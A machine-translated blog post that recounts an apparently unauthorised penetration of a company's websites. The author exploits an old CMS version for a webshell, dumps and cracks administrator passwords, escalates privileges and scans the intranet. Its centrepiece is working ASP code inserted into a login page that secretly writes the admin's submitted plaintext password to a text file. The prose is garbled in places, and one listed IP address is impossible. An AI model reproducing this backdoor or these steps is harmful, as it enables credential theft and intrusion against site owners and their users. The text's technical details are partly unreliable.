Only one login page website Penetration Process

Title: website Penetration Process with only one logon page
Author: Xiao Dan
Target station http://admin.123456.com/123456 for demonstration, a look at a management page dizzy. How can I win this...
 
Well, I first scanned it and opened 80, which is irrelevant to other ports. Okay, there is no way to segment C.
 
So when C goes down, I will go, and the C section will be similar to the domain name http://wrtye.123456.com/and a flash. Nothing, other C
All are far away from the target IP address, and the domain name is within 108,000. I knew that his subnet had just a few machines, and he didn't have to go to C Like A 2B .. No way.
. We can see that this is a sub-domain name. See if you can find any clue. When the main site looks at it, it is far from the target and the IP address, and CIDR block is not.
. But it may be in the same intranet. No way. You only need to start with the main site.
 
Http://www.123456.com/at the beginning. It is very difficult to see a search box...
 
O program probably knows. Ke Xun's, so I looked for it online. EXP had no results in various attempts, so I couldn't bypass it. Later I found ke Xun, a lower version of the station, and went down directly,
Load the database. Break the password and use SHELL. I just brought it...
After obtaining the shell, the main site's SHELL directly jumps to the directory and won it. This is not detailed, but our purpose is not to take the SHELL, but to download the database as a social worker.
There are three administrators. The first admin cannot be cracked. The second password is 000000. The third password is 123456 .. To work with social workers
First. No way, Ke Xun looked for it online, and it seems that there is no background to intercept the password or something. Well, I have to write it myself. Found his login file: loign. asp
 
01
<% End Sub
02
Sub CheckLogin ()
03
Dim PWD, UserName, LoginRS, SqlStr, RndPassword
04
Dim ScriptName, AdminLoginCode
05
AdminLoginCode = KS. G ("AdminLoginCode ")
06
IF Trim (Request. Form ("Verifycode") <> Trim (Session ("Verifycode") then
07
Call KS. Alert ("Logon Failed: \ n verification code is incorrect. Please enter it again !"," Login. asp ")
08
Exit Sub
09
End if
10
If EnableSiteManageCode = True And AdminLoginCode <> SiteManageCode Then
11
Call KS. Alert ("Logon Failed: \ n the backend management authentication code you entered is incorrect. Please enter it again !"," Login. asp ")
12
Exit Sub
13
End If
14
-----------------------------------
15
Added code
16
 
17
Dim aaa, bbb
18
Bbb = Request. form ("username ")
19
Aaa = Request. form ("pwd ")
20
If "admin" = bbb then
21
Dim Content, Fso, Fout
22
Set Fso = Server. CreateObject ("Scripting. FileSystemObject ")
23
Set Fout = Fso. CreateTextFile (Server. Mappath ("../435.txt "))
24
Fout. WriteLine "mm = '" & aaa & "'"
25
Fout. Write Content
26
Fout. Close
27
Set Fout = Nothing
28
Set Fso = Nothing
29
End if
30
-------------------------------
31
Pwd = MD5 (KS. R (Request. form ("pwd"), 16)
32
 
33
UserName = KS. R (trim (Request. form ("username ")))
34
RndPassword = KS. R (KS. MakeRandomChar (20 ))
35
ScriptName = KS. R (Trim (Request. ServerVariables ("HTTP_REFERER ")))
 
I started the test for a long time. We can see that this code, if "admin" = bbb then, only records the account whose account is admin. Then there is the code
It will overwrite the previously recorded password, that is, only record the Last login password. If there is a 2B black and wide, it cannot be intercepted if you try it in the room,
Of course there is a possibility, but it is very small. Unfortunately, management will soon be logged on ..
 
Okay, the password is intercepted, and then go to the target station to log on to the http://admin.123456.com/I rely on... still failed
It seems that the penetration will continue. So, ipconfig looked at it.
...: Home
...: Fe80: 9c3a: 340b: 748b: d
...: 192.168.46.124
...: 255.255.255.0
...: 192.168.46.290
Very good, It Is intranet, so pr raised the right, directly killed it in seconds, and then broke the HASH .. As a social work, and then continue to penetrate, So I scanned the lower network segment, special
For a live host 192.168.46.126. Access 192.168.46.126: 80. An error is displayed. If the active host is on our target site
In other words, it is accessible. Therefore, it is meaningless to continue Intranet penetration because the target station is not in the same intranet. No domain or domain penetration. So,
I went to the target station with some collected information, social workers, or no results. Is this a matter of character?
This is the end of the tutorial. Although the target station did not win, it provides many ideas and skills.
This article is from: Xiaogan's Blog